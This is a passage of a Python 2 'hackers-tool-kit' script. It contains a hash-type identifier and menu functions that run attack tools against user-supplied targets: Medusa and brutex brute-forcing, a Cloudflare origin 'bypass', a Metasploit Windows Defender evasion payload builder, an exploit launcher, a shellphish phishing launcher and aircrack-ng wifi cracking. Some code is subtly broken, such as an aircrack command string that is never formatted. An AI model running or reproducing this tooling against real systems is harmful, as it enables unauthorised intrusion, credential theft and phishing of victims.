hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + 